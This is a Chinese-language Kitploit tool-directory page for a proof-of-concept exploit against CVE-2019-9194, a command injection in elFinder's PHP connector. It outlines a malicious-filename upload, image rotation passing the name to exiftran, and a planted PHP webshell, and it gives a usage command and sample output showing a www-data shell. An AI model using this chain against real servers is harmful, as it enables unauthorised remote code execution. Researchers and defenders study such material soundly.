Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2019-9194-elFinder-Command-Injection-PoC — 在 elFinder <= 2.1.47 中,通过 PHP connector 组件存在命令注入漏洞。允许未经认证的远程攻击者以 Web 服务器用户的身份执行任意代码。 | Kitploit
工具/GitHubGitHub/estebanzarate/cve-2019-9194-elfinder-command-injection-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubestebanzarate/cve-2019-9194-elfinder-command-injection-poc

CVE-2019-9194-elFinder-Command-Injection-PoC

在 elFinder <= 2.1.47 中,通过 PHP connector 组件存在命令注入漏洞。允许未经认证的远程攻击者以 Web 服务器用户的身份执行任意代码。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
297个月前尚未审核

CVE-2019-9194 — elFinder 命令注入 (PoC)

elFinder <= 2.1.47 中通过 PHP 连接器组件存在的命令注入漏洞。允许未经身份验证的远程攻击者以 Web 服务器用户的身份执行任意代码。

工作原理

  • 上传一个带有恶意文件名的有效 JPEG 文件,文件名中包含 shell 命令。
  • 通过请求图像旋转触发漏洞,该操作将文件名未经清理地传递给 exiftran。
  • 注入的命令将 PHP webshell (SecSignal.php) 写入服务器。
  • 连接到 webshell 并进入交互式 shell。

使用要求

  • Python 3
  • requests 库 (pip install requests)
  • 目标必须已安装 exiftran 并启用了 elFinder PHP 连接器 (connector.minimal.php)

使用方法

python3 exploit.py http://TARGET

示例:

$ python3 exploit.py http://10.10.10.10/elFinder
[*] Uploading malicious image...
[*] File uploaded, hash: l1_U2VjU2lnbmFsLmpwZw
[*] Triggering command injection via image rotation...
[*] Checking for webshell...
[+] Pwned!
[+] Interactive shell (Ctrl+C to exit)

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

参考

  • CVE-2019-9194
  • EDB-46481
  • 漏洞分析 — SecSignal
  • elFinder 2.1.48 发布(修复)

致谢

  • 发现:Thomas Chauchefoin
  • 原始漏洞利用:@q3rv0
  • Python 3 移植及 Metasploit 风格改进:Esteban Zárate
下载工具